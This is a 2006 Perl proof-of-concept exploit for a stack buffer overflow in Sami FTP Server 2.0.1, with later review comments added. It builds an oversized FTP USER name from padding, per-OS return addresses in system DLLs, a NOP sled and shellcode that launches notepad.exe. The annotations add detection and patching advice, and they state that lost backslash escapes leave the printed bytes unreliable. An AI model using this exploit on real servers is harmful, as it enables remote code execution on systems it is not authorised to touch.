# Title : Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC
# Published : 2006-01-25
# Author : Critical Security
#!/usr/bin/perl
# Sami FTP Server v2.0.1 Remote notepad.exe execution PoC by Critical Security research http://www.critical.lt
# Tested on Windows XP SP2, Windows XP SP0 and even on FreeBSD 6.0-RELEASE Wine 0.9.6 :))
use Net::FTP; # <- jo, ae tinginys :)
use Switch;
# Historical (2006) proof-of-concept against Sami FTP Server 2.0.1.
# Flow: pick up -h/-y/-o from @ARGV, map the -o selector to a hard-coded
# return address for one OS build, connect with Net::FTP and send a crafted
# USER name through login().  The user name is padding up to the overwritten
# return address, the chosen address (call esp / jmp esp in a system DLL), a
# NOP sled and a payload the author describes as launching notepad.exe on the
# server.
#
# NOTE(review): backslash escapes appear to have been lost in this copy of the
# script ("n" where a newline is meant, "x90", "xE0x3AxB4x76", ...), so the
# literal byte values shown here are not reliable; do not derive signatures
# or IoCs from them as printed.
#
# Defender notes: each return address is an absolute address inside a system
# DLL for one specific OS service pack, i.e. the technique depends on that
# DLL loading at a fixed base.  An FTP USER command several hundred bytes
# long that contains non-printable data is a strong detection signal for this
# vulnerability class; the remedy is a patched or decommissioned server.
# The script has no `use strict; use warnings;`, so every variable below is a
# package global.
if (@ARGV < 3) {
# Usage is printed when fewer than three arguments are given, then execution
# falls through (there is no `exit`) and the defaults below are used, as the
# last help line states.
print "--------------------------------------------------------------------n";
print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumbern";
print " Offsets: n";
print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call espn";
print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call espn";
print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp espn";
print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp espn";
print " If values not specified, default values will be used.n";
print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1n";
print "--------------------------------------------------------------------n";
}
$host = "127.0.0.1"; # target IP (default)
# Author's note on $yourip: the address also ends up on the stack, so the
# padding length is derived from its length further down; they recommend the
# externally visible address (or the gateway IP if there is none).
$yourip = "127.0.0.1" ; # attacker-side IP (default)
$offset = "xE0x3AxB4x76"; # default return address: call esp in winmm.dll (Windows XP SP2)
# Crude option parsing; the last matching argument wins for each option.
# The unescaped "." in the -h/-y patterns matches any character (possibly
# another lost backslash), so the value is not really validated as an IP.
foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*).(.*).(.*).(.*))/);
$yourip = $1 if ($_=~/-y((.*).(.*).(.*).(.*))/);
$offset = $1 if ($_=~/-o(.*)/); # numeric selector 1..4; any other value is used verbatim as the address bytes
}
# Author's note: the offsets were looked up with findjmp.exe or the
# metasploit.com opcode database (call esp / jmp esp).
# Switch.pm is a source filter (removed from core in Perl 5.14); it maps the
# numeric -o selector to the matching return address.
switch ($offset) {
case 1 { $offset = "xE0x3AxB4x76" } # Windows XP SP2 winmm.dll call esp
case 2 { $offset = "x7BxD1xB5x76" } # Windows XP SP1 winmm.dll call esp
case 3 { $offset = "xFBx7BxABx71" } # Windows XP SP0 ws2_32.dll jmp esp
case 4 { $offset = "xDFx95x22x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp esp
}
# Counts the characters of $yourip into $c, which is never initialised and
# relies on undef being treated as 0; equivalent to length($yourip).
foreach $letter (split '', $yourip) { $c++;};
# Connects to the target control channel; only a failed connection is fatal.
$ftp = Net::FTP->new($host, Debug => 0) or die "Cannot connect: $@";
$user = "A" x 213 . # padding up to the saved return address (author: the payload could also sit here)
"A" x (15 - $c) . # alignment bytes: the IP address is also written to the stack, so the return-address position is adjusted by its length
$offset . # return address: call esp / jmp esp in some DLL -- anything that lands execution at esp
"x90" x 25 . # NOP sled to line up with the address esp points at
# Payload bytes.  The author says it launches notepad.exe (the trailing bytes
# spell "notepad.exe") and notes it was chosen to answer claims that the group
# only publishes DoS.  Opaque to this review; see the escape-stripping caveat
# at the top of the script.
"xCDx03".
"xEBx61x56x6Ax30x59x64x8Bx01x8Bx40x0C".
"x8Bx70x1CxADx8Bx40x08x5ExC3x60x8Bx6C".
"x24x24x8Bx45x3Cx8Bx54x05x78x01xEAx8B".
"x4Ax18x8Bx5Ax20x01xEBxE3x34x49x8Bx34".
"x8Bx01xEEx31xFFx31xC0xFCxACx84xC0x74".
"x07xC1xCFx0Dx01xC7xEBxF4x3Bx7Cx24x28".
"x75xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8B".
"x5Ax1Cx01xEBx8Bx04x8Bx01xE8x89x44x24".
"x1Cx61xC3xE8x9AxFFxFFxFFx68x98xFEx8A".
"x0Ex50xE8xA2xFFxFFxFFxEBx02xEBx05xE8".
"xF9xFFxFFxFFx5Bx83xC3x1Cx33xC9x88x0B".
"x83xEBx0Bx41x51x53xFFxD0x90x6Ex6Fx74".
"x65x70x61x64x2Ex65x78x65x01";
# Sends the crafted USER name; the return value is not checked and the
# session is never closed with quit().
$ftp->login("$user","biatch");